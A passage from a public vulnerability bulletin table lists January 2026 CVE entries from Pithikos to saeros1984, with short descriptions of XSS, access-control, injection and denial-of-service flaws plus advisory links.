| Pithikos--Pithikos | An input validation issue in in Pithikos websocket-server v.0.6.4 allows a remote attacker to obtain sensitive information or cause unexpected server behavior via the websocket_server/websocket_server.py, WebSocketServer._message_received components. | 2026-01-20 | not yet calculated | CVE-2025-66902 | https://github.com/cyberinvest211/websocket-server-vuln-poc/tree/main |
| pixelgrade--Nova Blocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pixelgrade Nova Blocks nova-blocks allows DOM-Based XSS. This issue affects Nova Blocks: from n/a through <= 2.1.9. | 2026-01-23 | not yet calculated | CVE-2026-24528 | https://patchstack.com/database/Wordpress/Plugin/nova-blocks/vulnerability/wordpress-nova-blocks-plugin-2-1-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PluginOps--Landing Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PluginOps Landing Page Builder page-builder-add allows Stored XSS. This issue affects Landing Page Builder: from n/a through <= 1.5.3.3. | 2026-01-23 | not yet calculated | CVE-2026-24620 | https://patchstack.com/database/Wordpress/Plugin/page-builder-add/vulnerability/wordpress-landing-page-builder-plugin-1-5-3-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| pondol--Pondol BBS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pondol Pondol BBS pondol-bbs allows Stored XSS. This issue affects Pondol BBS: from n/a through <= 1.1.8.4. | 2026-01-22 | not yet calculated | CVE-2025-49336 | https://patchstack.com/database/Wordpress/Plugin/pondol-bbs/vulnerability/wordpress-pondol-bbs-plugin-1-1-8-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PopCash--PopCash.Net Code Integration Tool | Missing Authorization vulnerability in PopCash PopCash.Net Code Integration Tool popcashnet-code-integration-tool allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PopCash.Net Code Integration Tool: from n/a through <= 1.8. | 2026-01-23 | not yet calculated | CVE-2026-24619 | https://patchstack.com/database/Wordpress/Plugin/popcashnet-code-integration-tool/vulnerability/wordpress-popcash-net-code-integration-tool-plugin-1-8-broken-access-control-vulnerability?_s_id=cve |
| POSIMYTH--Nexter Blocks | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in POSIMYTH Nexter Blocks the-plus-addons-for-block-editor allows Retrieve Embedded Sensitive Data. This issue affects Nexter Blocks: from n/a through <= 4.6.3. | 2026-01-22 | not yet calculated | CVE-2026-24377 | https://patchstack.com/database/Wordpress/Plugin/the-plus-addons-for-block-editor/vulnerability/wordpress-nexter-blocks-plugin-4-6-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Poultry Farm Management System--Poultry Farm Management System | Stored Cross-Site Scripting (XSS) in Poultry Farm Management System v1.0 due to the lack of proper validation of user input by sending a POST request. The relationship between parameters and assigned identifiers is as follows: 'companyaddress', 'companyemail', 'companyname', 'country', 'mobilenumber' y 'regno' parameters in '/farm/farmprofile.php'. | 2026-01-20 | not yet calculated | CVE-2025-41024 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-poultry-farm-management-system |
| Poultry Farm Management System--Poultry Farm Management System | Stored Cross-Site Scripting (XSS) in Poultry Farm Management System v1.0 due to the lack of proper validation of user input by sending a POST request. The relationship between parameters and assigned identifiers is as follows: 'category' y 'product' parameters in '/farm/sell_product.php'. | 2026-01-20 | not yet calculated | CVE-2025-41025 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-poultry-farm-management-system |
| Prince--Integrate Google Drive | Missing Authorization vulnerability in Prince Integrate Google Drive integrate-google-drive allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Integrate Google Drive: from n/a through <= 1.5.5. | 2026-01-23 | not yet calculated | CVE-2026-24540 | https://patchstack.com/database/Wordpress/Plugin/integrate-google-drive/vulnerability/wordpress-integrate-google-drive-plugin-1-5-5-broken-access-control-vulnerability?_s_id=cve |
| Prince--Radio Player | Server-Side Request Forgery (SSRF) vulnerability in Prince Radio Player radio-player allows Server Side Request Forgery. This issue affects Radio Player: from n/a through <= 2.0.91. | 2026-01-23 | not yet calculated | CVE-2026-24548 | https://patchstack.com/database/Wordpress/Plugin/radio-player/vulnerability/wordpress-radio-player-plugin-2-0-91-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Proptech Plugin--Apimo Connector | Missing Authorization vulnerability in Proptech Plugin Apimo Connector apimo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Apimo Connector: from n/a through <= 2.6.4. | 2026-01-22 | not yet calculated | CVE-2026-22445 | https://patchstack.com/database/Wordpress/Plugin/apimo/vulnerability/wordpress-apimo-connector-plugin-2-6-4-broken-access-control-vulnerability?_s_id=cve |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Pterodactyl implements rate limits that are applied to the total number of resources (e.g. databases, port allocations, or backups) that can exist for an individual server. These resource limits are applied on a per-server basis, and validated during the request cycle. However, in versions prior to 1.12.0, it is possible for a malicious user to send a massive volume of requests at the same time that would create more resources than the server is allotted. This is because the validation occurs early in the request cycle and does not lock the target resource while it is processing. As a result sending a large volume of requests at the same time would lead all of those requests to validate as not using any of the target resources, and then all creating the resources at the same time. As a result a server would be able to create more databases, allocations, or backups than configured. A malicious user is able to deny resources to other users on the system, and may be able to excessively consume the limited allocations for a node, or fill up backup space faster than is allowed by the system. Version 1.12.0 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2025-69198 | https://github.com/pterodactyl/panel/security/advisories/GHSA-jw2v-cq5x-q68g https://github.com/pterodactyl/panel/commit/09caa0d4995bd924b53b9a9e9b4883ac27bd5607 |
| pterodactyl--panel | Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Prior to version 1.12.0, websockets within wings lack proper rate limiting and throttling. As a result a malicious user can open a large number of connections and then request data through these sockets, causing an excessive volume of data over the network and overloading the host system memory and cpu. Additionally, there is not a limit applied to the total size of messages being sent or received, allowing a malicious user to open thousands of websocket connections and then send massive volumes of information over the socket, overloading the host network, and causing increased CPU and memory load within Wings. Version 1.12.0 patches the issue. | 2026-01-19 | not yet calculated | CVE-2025-69199 | https://github.com/pterodactyl/panel/security/advisories/GHSA-8w7m-w749-rx98 |
| pterodactyl--wings | Wings is the server control plane for Pterodactyl, a free, open-source game server management panel. Starting in version 1.7.0 and prior to version 1.12.0, Wings does not consider SQLite max parameter limit when processing activity log entries allowing for low privileged user to trigger a condition that floods the panel with activity records. After Wings sends activity logs to the panel it deletes the processed activity entries from the wings SQLite database. However, it does not consider the max parameter limit of SQLite, 32766 as of SQLite 3.32.0. If wings attempts to delete more than 32766 entries from the SQLite database in one query, it triggers an error (SQL logic error: too many SQL variables (1)) and does not remove any entries from the database. These entries are then indefinitely re-processed and resent to the panel each time the cron runs. By successfully exploiting this vulnerability, an attacker can trigger a situation where wings will keep uploading the same activity data to the panel repeatedly (growing each time to include new activity) until the panels' database server runs out of disk space. Version 1.12.0 fixes the issue. | 2026-01-19 | not yet calculated | CVE-2026-21696 | https://github.com/pterodactyl/wings/security/advisories/GHSA-2497-gp99-2m74 https://github.com/pterodactyl/wings/blob/9ffbcdcdb1163da823cf9959b9602df9f7dcb54a/internal/cron/activity_cron.go#L81 https://github.com/pterodactyl/wings/blob/9ffbcdcdb1163da823cf9959b9602df9f7dcb54a/internal/cron/sftp_cron.go#L86 |
| purethemes--WorkScout | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout workscout allows Reflected XSS. This issue affects WorkScout: from n/a through <= 4.1.07. | 2026-01-22 | not yet calculated | CVE-2025-67959 | https://patchstack.com/database/Wordpress/Theme/workscout/vulnerability/wordpress-workscout-theme-4-1-07-cross-site-scripting-xss-vulnerability?_s_id=cve |
| purethemes--WorkScout-Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes WorkScout-Core workscout-core allows Reflected XSS. This issue affects WorkScout-Core: from n/a through <= 1.7.06. | 2026-01-22 | not yet calculated | CVE-2025-67960 | https://patchstack.com/database/Wordpress/Plugin/workscout-core/vulnerability/wordpress-workscout-core-plugin-1-7-06-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| PyPI--PiPI | An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. | 2026-01-20 | not yet calculated | CVE-2025-56005 | https://github.com/bohmiiidd/Undocumented-RCE-in-PLY |
| Python Software Foundation--CPython | When folding a long comment in an email header containing exclusively unfoldable characters, the parenthesis would not be preserved. This could be used for injecting headers into email messages where addresses are user-controlled and not sanitized. | 2026-01-20 | not yet calculated | CVE-2025-11468 | https://github.com/python/cpython/pull/143936 https://github.com/python/cpython/issues/143935 https://mail.python.org/archives/list/security-announce@python.org/thread/FELSEOLBI2QR6YLG6Q7VYF7FWSGQTKLI/ https://github.com/python/cpython/commit/17d1490aa97bd6b98a42b1a9b324ead84e7fd8a2 |
| Python Software Foundation--CPython | When passing data to the b64decode(), standard_b64decode(), and urlsafe_b64decode() functions in the "base64" module the characters "+/" will always be accepted, regardless of the value of "altchars" parameter, typically used to establish an "alternative base64 alphabet" such as the URL safe alphabet. This behavior matches what is recommended in earlier base64 RFCs, but newer RFCs now recommend either dropping characters outside the specified base64 alphabet or raising an error. The old behavior has the possibility of causing data integrity issues. This behavior can only be insecure if your application uses an alternate base64 alphabet (without "+/"). If your application does not use the "altchars" parameter or the urlsafe_b64decode() function, then your application does not use an alternative base64 alphabet. The attached patches DOES NOT make the base64-decode behavior raise an error, as this would be a change in behavior and break existing programs. Instead, the patch deprecates the behavior which will be replaced with the newly recommended behavior in a future version of Python. Users are recommended to mitigate by verifying user-controlled inputs match the base64 alphabet they are expecting or verify that their application would not be affected if the b64decode() functions accepted "+" or "/" outside of altchars. | 2026-01-21 | not yet calculated | CVE-2025-12781 | https://github.com/python/cpython/pull/141128 https://github.com/python/cpython/issues/125346 https://mail.python.org/archives/list/security-announce@python.org/thread/KRI7GC6S27YV5NJ4FPDALS2WI5ENAFJ6/ https://github.com/python/cpython/commit/13360efd385d1a7d0659beba03787ea3d063ef9b https://github.com/python/cpython/commit/1be80bec7960f5ccd059e75f3dfbd45fca302947 https://github.com/python/cpython/commit/9060b4abbe475591b6230b23c2afefeff26fcca5 https://github.com/python/cpython/commit/e95e783dff443b68e8179fdb57737025bf02ba76 https://github.com/python/cpython/commit/fd17ee026fa9b67f6288cbafe374a3e479fe03a5 |
| Python Software Foundation--CPython | User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype. | 2026-01-20 | not yet calculated | CVE-2025-15282 | https://github.com/python/cpython/pull/143926 https://github.com/python/cpython/issues/143925 https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/ https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0 |
| Python Software Foundation--CPython | The imaplib module, when passed a user-controlled command, can have additional commands injected using newlines. Mitigation rejects commands containing control characters. | 2026-01-20 | not yet calculated | CVE-2025-15366 | https://github.com/python/cpython/issues/143921 https://github.com/python/cpython/pull/143922 https://mail.python.org/archives/list/security-announce@python.org/thread/DD7C7JZJYTBXMDOWKCEIEBJLBRU64OMR/ https://github.com/python/cpython/commit/6262704b134db2a4ba12e85ecfbd968534f28b45 |
| Python Software Foundation--CPython | The poplib module, when passed a user-controlled command, can have additional commands injected using newlines. Mitigation rejects commands containing control characters. | 2026-01-20 | not yet calculated | CVE-2025-15367 | https://github.com/python/cpython/pull/143924 https://github.com/python/cpython/issues/143923 https://mail.python.org/archives/list/security-announce@python.org/thread/CBFBOWVGGUJFSGITQCCBZS4GEYYZ7ZNE/ https://github.com/python/cpython/commit/b234a2b67539f787e191d2ef19a7cbdce32874e7 |
| Python Software Foundation--CPython | When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters. | 2026-01-20 | not yet calculated | CVE-2026-0672 | https://github.com/python/cpython/pull/143920 https://github.com/python/cpython/issues/143919 https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/ https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70 https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440 |
| Python Software Foundation--CPython | User-controlled header names and values containing newlines can allow injecting HTTP headers. | 2026-01-20 | not yet calculated | CVE-2026-0865 | https://github.com/python/cpython/pull/143917 https://github.com/python/cpython/issues/143916 https://mail.python.org/archives/list/security-announce@python.org/thread/BJ6QPHNSHJTS3A7CFV6IBMCAP2DWRVNT/ https://github.com/python/cpython/commit/22e4d55285cee52bc4dbe061324e5f30bd4dee58 https://github.com/python/cpython/commit/23e3c0ae867cca0130e441e776c9955b9027c510 https://github.com/python/cpython/commit/4802b96a2cde58570c24c13ef3289490980961c5 https://github.com/python/cpython/commit/f7fceed79ca1bceae8dbe5ba5bc8928564da7211 https://github.com/python/cpython/commit/2f840249550e082dc351743f474ba56da10478d2 https://github.com/python/cpython/commit/e4846a93ac07a8ae9aa18203af0dd13d6e7a6995 |
| Python Software Foundation--CPython | The email module, specifically the "BytesGenerator" class, didn't properly quote newlines for email headers when serializing an email message allowing for header injection when an email is serialized. This is only applicable if using "LiteralHeader" writing headers that don't respect email folding rules, the new behavior will reject the incorrectly folded headers in "BytesGenerator". | 2026-01-23 | not yet calculated | CVE-2026-1299 | https://github.com/python/cpython/pull/144126 https://github.com/python/cpython/issues/144125 https://cve.org/CVERecord?id=CVE-2024-6923 https://mail.python.org/archives/list/security-announce@python.org/thread/6ZZULGALJTITEAGEXLDJE2C6FORDXPBT/ https://github.com/python/cpython/commit/052e55e7d44718fe46cbba0ca995cb8fcc359413 |
| Python--Protobuf | A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages. Due to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python's recursion stack and causing a RecursionError. | 2026-01-23 | not yet calculated | CVE-2026-0994 | https://github.com/protocolbuffers/protobuf/pull/25239 |
| QantumThemes--Kentha Elementor Widgets | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in QantumThemes Kentha Elementor Widgets kentha-elementor allows PHP Local File Inclusion. This issue affects Kentha Elementor Widgets: from n/a through < 3.1. | 2026-01-22 | not yet calculated | CVE-2026-24390 | https://patchstack.com/database/Wordpress/Plugin/kentha-elementor/vulnerability/wordpress-kentha-elementor-widgets-plugin-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| QantumThemes--KenthaRadio | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in QantumThemes KenthaRadio qt-kentharadio allows Reflected XSS. This issue affects KenthaRadio: from n/a through <= 2.2.0. | 2026-01-22 | not yet calculated | CVE-2025-69003 | https://patchstack.com/database/Wordpress/Theme/qt-kentharadio/vulnerability/wordpress-kentharadio-theme-2-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| QOS.CH Sarl--Logback-core | ACE vulnerability in configuration file processing by QOS.CH logback-core up to and including version 1.5.24 in Java applications, allows an attacker to instantiate classes already present on the class path by compromising an existing logback configuration file. The instantiation of a potentially malicious Java class requires that said class is present on the user's class-path. In addition, the attacker must have write access to a configuration file. However, after successful instantiation, the instance is very likely to be discarded with no further ado. | 2026-01-22 | not yet calculated | CVE-2026-1225 | https://logback.qos.ch/news.html#1.5.25 |
| Raptive--Raptive Ads | Missing Authorization vulnerability in Raptive Raptive Ads adthrive-ads allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Raptive Ads: from n/a through <= 3.10.0. | 2026-01-23 | not yet calculated | CVE-2026-24602 | https://patchstack.com/database/Wordpress/Plugin/adthrive-ads/vulnerability/wordpress-raptive-ads-plugin-3-10-0-broken-access-control-vulnerability?_s_id=cve |
| Rasedul Haque Rumi--BD Courier Order Ratio Checker | Missing Authorization vulnerability in Rasedul Haque Rumi BD Courier Order Ratio Checker bd-courier-order-ratio-checker allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BD Courier Order Ratio Checker: from n/a through <= 2.0.1. | 2026-01-22 | not yet calculated | CVE-2026-22481 | https://patchstack.com/database/Wordpress/Plugin/bd-courier-order-ratio-checker/vulnerability/wordpress-bd-courier-order-ratio-checker-plugin-2-0-1-broken-access-control-vulnerability?_s_id=cve |
| RealMag777--TableOn | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 TableOn posts-table-filterable allows Reflected XSS. This issue affects TableOn: from n/a through <= 1.0.4.2. | 2026-01-22 | not yet calculated | CVE-2025-69316 | https://patchstack.com/database/Wordpress/Plugin/posts-table-filterable/vulnerability/wordpress-tableon-plugin-1-0-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Remi Corson--Easy Theme Options | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Remi Corson Easy Theme Options easy-theme-options allows Reflected XSS. This issue affects Easy Theme Options: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2025-68839 | https://patchstack.com/database/Wordpress/Plugin/easy-theme-options/vulnerability/wordpress-easy-theme-options-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| renatoatshown--Shown Connector | Missing Authorization vulnerability in renatoatshown Shown Connector shown-connector allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Shown Connector: from n/a through <= 1.2.10. | 2026-01-22 | not yet calculated | CVE-2025-68003 | https://patchstack.com/database/Wordpress/Plugin/shown-connector/vulnerability/wordpress-shown-connector-plugin-1-2-10-settings-change-vulnerability?_s_id=cve |
| Revive--Revive Adserver | HackerOne community member Faraz Ahmed (PakCyberbot) has reported a format string injection in the Revive Adserver settings. When specific character combinations are used in a setting, the admin user console could be disabled due to a fatal PHP error. | 2026-01-20 | not yet calculated | CVE-2026-21640 | https://hackerone.com/reports/3445332 |
| Revive--Revive Adserver | HackerOne community member Jad Ghamloush (0xjad) has reported an authorization bypass vulnerability in the `tracker-delete.php` script of Revive Adserver. Users with permissions to delete trackers are mistakenly allowed to delete trackers owned by other accounts. | 2026-01-20 | not yet calculated | CVE-2026-21641 | https://hackerone.com/reports/3445710 |
| Revive--Revive Adserver | HackerOne community member Patrick Lang (7yr) has reported a reflected XSS vulnerability in the `banner-acl.php` and `channel-acl.php` scripts of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed. | 2026-01-20 | not yet calculated | CVE-2026-21642 | https://hackerone.com/reports/3470970 |
| Revive--Revive Adserver | HackerOne community member Patrick Lang (7yr) has reported a reflected XSS vulnerability in the banner-acl.php script of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed. | 2026-01-20 | not yet calculated | CVE-2026-21663 | https://hackerone.com/reports/3473696 |
| Revive--Revive Adserver | HackerOne community member Huynh Pham Thanh Luc (nigh7c0r3) has reported a reflected XSS vulnerability in the afr.php delivery script of Revive Adserver. An attacker can craft a specific URL that includes an HTML payload in a parameter. If a logged in administrator visits the URL, the HTML is sent to the browser and malicious scripts would be executed. | 2026-01-20 | not yet calculated | CVE-2026-21664 | https://hackerone.com/reports/3468169 |
| richardevcom--Add Polylang support for Customizer | Cross-Site Request Forgery (CSRF) vulnerability in richardevcom Add Polylang support for Customizer add-polylang-support-for-customizer allows Cross Site Request Forgery. This issue affects Add Polylang support for Customizer: from n/a through <= 1.4.5. | 2026-01-22 | not yet calculated | CVE-2026-22462 | https://patchstack.com/database/Wordpress/Plugin/add-polylang-support-for-customizer/vulnerability/wordpress-add-polylang-support-for-customizer-plugin-1-4-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Riftzilla--QRGen | Reflected Cross-Site Scripting (XSS) vulnerability in Riftzilla's QRGen. This vulnerability allows an attavker to execute JavaScript code in the victim's browser by sending them a malicious URL using the 'id' parameter in '/article.php'. This vulnerability can be exploited to steal sensitive user data, such as session cookies, or to perform actions on behalf of the user. | 2026-01-20 | not yet calculated | CVE-2025-40644 | https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-qrgens-riftzilla |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. After running a Burp Suite active scan, the device loses ICMP connectivity, causing the web application to become inaccessible. | 2026-01-20 | not yet calculated | CVE-2025-9278 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles EtherNet/IP Step Limit Storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9279 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. Fuzzing performed using Defensics causes the device to become unresponsive, requiring a reboot. | 2026-01-20 | not yet calculated | CVE-2025-9280 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive step limit storm tests, the device reboots | 2026-01-20 | not yet calculated | CVE-2025-9281 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive limited storm tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9282 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles EtherNet/IP Step Limits Storms tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9283 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. This vulnerability is triggered during fuzzing of multiple CIP classes, which causes the CIP port to become unresponsive. | 2026-01-20 | not yet calculated | CVE-2025-9464 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles Comprehensive grammar tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9465 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--ArmorStart LT | A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. During execution of the Achilles EtherNet/IP and CIP grammar tests, the device reboots unexpectedly, causing the Link State Monitor to go down for several seconds. | 2026-01-20 | not yet calculated | CVE-2025-9466 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html |
| Rockwell Automation--CompactLogix 5370 | A denial-of-service security issue in the affected product. The security issue occurs when a malformed CIP forward open message is sent. This could result in a major nonrecoverable fault a restart is required to recover. | 2026-01-20 | not yet calculated | CVE-2025-11743 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1770.html |
| Rockwell Automation--ControlLogix Redundancy Enhanced Module | Multiple denial-of-service vulnerabilities exist in the affected product. These issues can be triggered through various crafted inputs, including malformed Class 3 messages, memory leak conditions, and other resource exhaustion scenarios. Exploitation may cause the device to become unresponsive and, in some cases, result in a major nonrecoverable fault. Recovery may require a restart. | 2026-01-20 | not yet calculated | CVE-2025-14027 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1769.html |
| Rockwell Automation--Verve Asset Manager | A security issue was discovered within the legacy ADI server component of Verve Asset Manager, caused by plaintext secrets stored in environment variables on the ADI server. This component has been retired and has been optional since the 1.36 release in 2024. | 2026-01-20 | not yet calculated | CVE-2025-14376 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1767.html |
| Rockwell Automation--Verve Asset Manager | A security issue was discovered within the legacy Ansible playbook component of Verve Asset Manager, caused by plaintext secrets incorrectly stored when a playbook is running. This component has been retired and has been optional since the 1.36 release in 2024. | 2026-01-20 | not yet calculated | CVE-2025-14377 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1767.html |
| Roxnor--GetGenie | Missing Authorization vulnerability in Roxnor GetGenie getgenie allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects GetGenie: from n/a through <= 4.3.0. | 2026-01-22 | not yet calculated | CVE-2026-24356 | https://patchstack.com/database/Wordpress/Plugin/getgenie/vulnerability/wordpress-getgenie-plugin-4-3-0-broken-access-control-vulnerability?_s_id=cve |
| Ruijie Networks Co., Ltd.--AP180(JA) V1.xx | AP180 series with firmware versions prior to AP_RGOS 11.9(4)B1P8 contains an OS command injection vulnerability. If this vulnerability is exploited, arbitrary commands may be executed on the devices. | 2026-01-22 | not yet calculated | CVE-2026-23699 | https://www.ruijie.co.jp/products/rg-ap180-pe_p432111650928590848.html#productDocument https://jvn.jp/en/jp/JVN86850670/ |
| RuoYi--RuoYi | Incorrect access control in the update function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily modify data outside of their scope. | 2026-01-23 | not yet calculated | CVE-2025-70985 | https://github.com/yangzongzhuan/RuoYi https://gitee.com/y_project/RuoYi https://gitee.com/y_project/RuoYi/issues/IDIDK2 https://gist.github.com/old6ma/1a2dada02656ba9a4730c85f6c765f4f |
| RuoYi--RuoYi | Incorrect access control in the selectDept function of RuoYi v4.8.2 allows unauthorized attackers to arbitrarily access sensitive department data. | 2026-01-23 | not yet calculated | CVE-2025-70986 | https://github.com/yangzongzhuan/RuoYi https://gitee.com/y_project/RuoYi https://gitee.com/y_project/RuoYi/issues/IDIDME https://gist.github.com/old6ma/779320a98f361c299ca024521cb72db6 |
| Rustaurius--Ultimate Reviews | Authorization Bypass Through User-Controlled Key vulnerability in Rustaurius Ultimate Reviews ultimate-reviews allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ultimate Reviews: from n/a through <= 3.2.16. | 2026-01-23 | not yet calculated | CVE-2026-24634 | https://patchstack.com/database/Wordpress/Plugin/ultimate-reviews/vulnerability/wordpress-ultimate-reviews-plugin-3-2-16-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Ryviu--Ryviu – Product Reviews for WooCommerce | Missing Authorization vulnerability in Ryviu Ryviu – Product Reviews for WooCommerce ryviu allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Ryviu – Product Reviews for WooCommerce: from n/a through <= 3.1.26. | 2026-01-23 | not yet calculated | CVE-2026-24562 | https://patchstack.com/database/Wordpress/Plugin/ryviu/vulnerability/wordpress-ryviu-product-reviews-for-woocommerce-plugin-3-1-26-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--AppExperts | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saad Iqbal AppExperts appexperts allows SQL Injection. This issue affects AppExperts: from n/a through <= 1.4.5. | 2026-01-22 | not yet calculated | CVE-2025-68881 | https://patchstack.com/database/Wordpress/Plugin/appexperts/vulnerability/wordpress-appexperts-plugin-1-4-5-sql-injection-vulnerability?_s_id=cve |
| saeros1984--Neoforum | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in saeros1984 Neoforum neoforum allows Reflected XSS. This issue affects Neoforum: from n/a through <= 1.0. | 2026-01-23 | not yet calculated | CVE-2026-24623 | https://patchstack.com/database/Wordpress/Plugin/neoforum/vulnerability/wordpress-neoforum-plugin-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| saeros1984--Neoforum | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in saeros1984 Neoforum neoforum allows Blind SQL Injection. This issue affects Neoforum: from n/a through <= 1.0. | 2026-01-23 | not yet calculated | CVE-2026-24624 | https://patchstack.com/database/Wordpress/Plugin/neoforum/vulnerability/wordpress-neoforum-plugin-1-0-sql-injection-vulnerability?_s_id=cve |
